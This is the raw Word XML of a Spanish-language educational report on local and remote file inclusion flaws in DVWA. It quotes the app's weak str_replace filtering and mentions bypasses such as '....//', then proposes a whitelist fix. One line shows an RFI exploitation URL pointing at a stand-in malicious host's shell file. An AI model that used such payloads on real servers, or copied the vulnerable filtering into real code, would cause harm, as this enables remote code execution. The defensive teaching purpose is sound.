        <w:pStyle w:val="HTMLconformatoprevio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8853CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Ejemplo de Código Seguro</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F10F975" w14:textId="23F198D1" w:rsidR="009D6B8B" w:rsidRPr="008853CE" w:rsidRDefault="009D6B8B" w:rsidP="009D6B8B">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"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9D6B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805861" wp14:editId="2C92284C">
            <wp:extent cx="4797531" cy="2052084"/>
            <wp:effectExtent l="0" t="0" r="3175" b="5715"/>
            <wp:docPr id="923590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90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109" cy="2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B001" w14:textId="16660193" w:rsidR="008853CE" w:rsidRPr="008853CE" w:rsidRDefault="008853CE" w:rsidP="009D6B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:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3429C1F2" w14:textId="0A5F9396" w:rsidR="001872EF" w:rsidRPr="001872EF" w:rsidRDefault="001872EF" w:rsidP="00415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72EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.</w:t>
      </w:r>
      <w:r w:rsidR="00423A7E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.3</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00415A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00415A52">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve"> Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A86F2F7" w14:textId="6285D939" w:rsidR="001872EF" w:rsidRPr="00457DBA" w:rsidRDefault="001872EF" w:rsidP="00457DB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DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Validar y san</w:t>
      </w:r>
      <w:r w:rsidR="008C0D19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ear</w:t>
      </w:r>
      <w:r w:rsidRPr="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> todas las entradas del usuario</w:t>
      </w:r>
      <w:r w:rsidR="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="001A1D47">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>asegurando</w:t>
      </w:r>
      <w:r w:rsidRPr="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> que solo se puedan incluir archivos permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6589893A" w14:textId="77777777" w:rsidR="00457DBA" w:rsidRDefault="001872EF" w:rsidP="00457DB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7DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Utiliza</w:t>
      </w:r>
      <w:r w:rsidR="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ción de </w:t>
      </w:r>
      <w:r w:rsidRPr="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>listas blancas</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="511CF237" w14:textId="31EC2755" w:rsidR="001872EF" w:rsidRDefault="001872EF" w:rsidP="00457DB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72EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Configurar el servidor para restringir el acceso a archivos sensibles</w:t>
      </w:r>
      <w:r w:rsidR="00457DBA">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, asegurando que</w:t>
      </w:r>
      <w:r w:rsidRPr="001872EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> los archivos críticos no sean accesibles desde la web.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D9F5B1" w14:textId="77777777" w:rsidR="008C0D19" w:rsidRPr="001872EF" w:rsidRDefault="008C0D19" w:rsidP="008C0D1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8518E5" w14:textId="4E1F156F" w:rsidR="001872EF" w:rsidRPr="00651C2A" w:rsidRDefault="00423A7E" w:rsidP="00415A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51C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.3. </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">Ejemplo de Código extraído de DVWA, de </w:t>
      </w:r>
      <w:r w:rsidRPr="00651C2A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>NIVEL MEDIO</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B2BA104" w14:textId="15D703F7" w:rsidR="009E370B" w:rsidRDefault="009E370B" w:rsidP="00415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BFE415" wp14:editId="5E3454A0">
            <wp:extent cx="5400040" cy="1382233"/>
            <wp:effectExtent l="0" t="0" r="0" b="8890"/>
            <wp:docPr id="89684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0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878" cy="13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4AAE" w14:textId="4C305C0E" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="008C0D19" w:rsidP="008C0D19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>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Explicación:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51D0375F" w14:textId="699CAC0F" w:rsidR="008C0D19" w:rsidRPr="008C0D19" w:rsidRDefault="008C0D19" w:rsidP="005B069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nicio y cierre del documento PHP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36FEABD6" w14:textId="76486178" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Obtención de la entrada del usuari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6312F42D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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="692E4E78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Copy Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30852F8E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$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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GET[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page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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007E2BE3" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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script obtiene el valor del parámetro 'page' de la URL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03665A04" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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e valor se asigna directamente a la variable $file sin ninguna validación inicial.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="089807ED" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Intento de validación de entrad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4B74BE1C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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58AE1CC8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Copy Code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A930431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str_</w:t>
      </w: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replace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rray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http://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https://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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="651495FA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str_</w:t>
      </w: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replace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rray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../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..\"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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61CA9147" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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El código intenta eliminar patrones potencialmente peligrosos de la entrada del usuario.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33343B7E" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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rimero, elimina "http://" y "https://" para prevenir inclusión de archivos remotos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75DB1D6C" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Luego, intenta eliminar </w:t>
      </w:r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"..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/" y "..\" para prevenir la navegación de directorios (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th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traversal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.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7204B177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roblemas de Seguridad</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39191E8A" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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Validación de entrada insuficiente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13B554CD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l uso de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tr_</w:t>
      </w:r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replace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 para eliminar patrones peligrosos es inadecuado y fácil de eludir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E82E695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Un atacante podría usar variaciones como </w:t>
      </w:r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"....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//" o codificación URL para evadir esta protección.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ED4BF1D" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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No hay una lista blanca de archivos permitido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72B4A555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script no verifica si el archivo solicitado está en una lista de archivos permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17379A01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o podría permitir el acceso a archivos no previstos dentro del directorio del servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B1BD009" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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osible inclusión de archivos no deseado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0508C18A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spués de la "validación", el script probablemente incluye el archivo sin más comprobaciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BF57D8F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o podría llevar a la inclusión de archivos PHP maliciosos o la exposición de archivos sensibles.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53DEBA27" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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Falta de sanitización de la salid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229856E4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o hay manejo de la salida, lo que podría llevar a vulnerabilidades XSS si el contenido del archivo incluido contiene código malicioso.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="494A31CF" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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No hay manejo de errore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3E65A8E4" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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código no maneja situaciones donde el archivo no existe o no es accesible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D0D12BC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Recomendaciones de Mejora</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5994A351" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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Implementar una lista blanc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364A3F48" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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Definir un array de archivos permitidos y verificar si la entrada del usuario coincide con uno de estos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="596A735D" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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Usar funciones de validación más robusta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63D89831" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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n lugar de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tr_</w:t>
      </w:r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replace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, usar expresiones regulares o funciones de filtrado de PHP.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07536EBD" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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anitización de la salid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26CC0175" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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Usar funciones como </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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htmlspecialchars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 al mostrar contenido para prevenir XSS.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B60B334" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B06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Manejo de errore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47C7B997" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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r un manejo adecuado de errores y excepciones.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5427BEAE" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069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Usar rutas absoluta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13CAF779" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="006866E5" w:rsidRDefault="006866E5" w:rsidP="005B069E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finir una constante con la ruta base y concatenarla con el nombre del archivo validado.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C84A3C3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jemplo de Mejora</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="378B62A1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hp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79539ED0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py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de</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="18009A16" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="008C0D19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8C0D19">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="E45649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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A23EFAB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defin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BASE_PATH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/var/www/html/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/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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FAE5D5E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5F40CEB7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[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home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bout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contact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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54472E27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49C268AE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sset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$_GET[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page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</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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)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?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$_GET[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page'</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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 :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home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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4236C53C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4A396976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f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(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n_</w:t>
      </w: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rray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)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&amp;&amp;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file_exist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r w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="B76B01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BASE_PATH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.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)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178FA578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 </w:t>
      </w:r>
      <w:proofErr w:type="gram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nclud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B76B01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BASE_PATH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.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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CCB98A6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} </w:t>
      </w:r>
      <w:proofErr w:type="spell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eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>else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 {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29AC1104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    </w:t>
      </w:r>
      <w:r w:rsidRPr="006866E5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="A0A1A7"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>// Manejar error o redirigir a página por defecto</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="491591E8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    </w:t>
      </w:r>
      <w:proofErr w:type="gram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nclud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B76B01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BASE_PATH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.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404.php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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B8B47BF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>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="094C5BC2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E45649"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5168CE22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Este enfoque mejorado utiliza una lista blanca de archivos permitidos, usa rutas absolutas, y maneja casos de error, proporcionando una solución mucho más segura contra ataques LFI.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EFE3C5E" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="005B069E" w:rsidRDefault="006866E5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546238" w14:textId="77777777" w:rsidR="009E370B" w:rsidRPr="005B069E" w:rsidRDefault="009E370B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3B735" w14:textId="77777777" w:rsidR="009E370B" w:rsidRPr="005B069E" w:rsidRDefault="009E370B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138AA" w14:textId="77777777" w:rsidR="009E370B" w:rsidRPr="005B069E" w:rsidRDefault="009E370B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8FF21" w14:textId="18187AB2" w:rsidR="001872EF" w:rsidRPr="005B069E" w:rsidRDefault="009E47DE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 xml:space="preserve">3.- </w:t>
      </w:r>
      <w:r w:rsidR="001A1D47" w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">VULNERABILIDAD DE INCLUSIÓN DE ARCHIVOS REMOTOS </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61006B14" w14:textId="22A364F8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3.1. Descripción</w:t>
      </w:r>
      <w:r w:rsidR="001A1D47" w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (RFI):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B6966CC" w14:textId="77777777" w:rsidR="001872EF" w:rsidRPr="005B069E" w:rsidRDefault="001872EF" w:rsidP="005B06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La vulnerabilidad de inclusión de archivos remotos (RFI) permite a un atacante incluir archivos remotos en la aplicación web, lo que puede llevar a la ejecución de código malicioso en el servidor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35995B9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3.2. Ejemplo de Código (Nivel Medio)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="575C0553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452DF4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php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79009339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CEAA5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B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Copy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B06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069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Code</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E62843F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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64784997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// El archivo que deseamos mostrar</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC047D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$file = $_GET['page'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6335190F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F32C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// Validación de entrada</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1C16CB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B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$file = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B069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B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>array("http://", "https://"), "", $file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69A3586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B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">$file = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>str_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>replace</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B069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B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>array("../", "..\""), "", $file);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A83BF49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?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B4E391F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23FC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3.3. Explotación</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12860705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80E1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Un atacante puede intentar incluir un archivo remoto malicioso:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27D1D9A2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96DBB1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http://example.com/index.php?page=http://malicious.com/shell.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E76E5D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5C99C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3.4. Recomendaciones</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358499B3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92E2A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 xml:space="preserve">    Deshabilitar la opción </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>allow_url_include</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B069E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> en la configuración de PHP: Esto previene la inclusión de archivos remotos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A3CCC55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 xml:space="preserve">    Validar y sanitizar todas las entradas del usuario: Asegúrate de que solo se puedan incluir archivos permitidos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3977D93B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 xml:space="preserve">    Utilizar listas blancas: Permitir solo archivos específicos que sean seguros.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D58C0B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6A5325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4. Conclusión</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0604816B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5AA94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Las vulnerabilidades de LFI y RFI representan serios riesgos para la seguridad de las aplicaciones web. Es crucial implementar prácticas de codificación segura, validar y sanitizar todas las entradas del usuario y configurar adecuadamente el servidor para mitigar estos riesgos.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06CDDF43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5. Aportaciones Visuales</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22FACB9B" w14:textId="77777777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D7E50" w14:textId="0A61D0FA" w:rsidR="001872EF" w:rsidRPr="005B069E" w:rsidRDefault="001872EF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69E">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Incluye capturas de pantalla y diagramas que muestren ejemplos de explotación y las medidas de mitigación implementadas.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B37126B" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="005B069E" w:rsidRDefault="006866E5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65C90D" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="005B069E" w:rsidRDefault="006866E5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4E85D" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="005B069E" w:rsidRDefault="006866E5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09868" w14:textId="77777777" w:rsidR="006866E5" w:rsidRPr="005B069E" w:rsidRDefault="006866E5" w:rsidP="005B06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97A0D4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E45649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&lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E01BE55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43EF8A23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i/>
          <w:iCs/>
          <w:color w:val="A0A1A7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// The page we wish to display</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57933096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$_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart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GET[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page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];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44BBDC75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760558E8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i/>
          <w:iCs/>
          <w:color w:val="A0A1A7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// Input validation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4630A568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str_</w:t>
      </w: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replace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rray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http://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https://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;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53465AA0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str_</w:t>
      </w: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replace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rray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(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../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..\"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""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fil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);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D0F8FC7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690BB575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E45649"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FAFAFA"/>
          <w:lang w:eastAsia="es-ES"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="013D467D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Vulnerabilidades RFI en este Código</w:t>
      </w:r>
    </w:p>
